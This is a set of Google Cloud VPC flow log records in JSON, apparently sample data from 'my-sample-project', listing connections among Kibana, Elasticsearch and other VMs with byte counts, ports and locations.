-{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"203.0.113.228","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"203.0.113.134","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"203.0.113.58","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.0.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"203.0.113.134","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"203.0.113.134","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 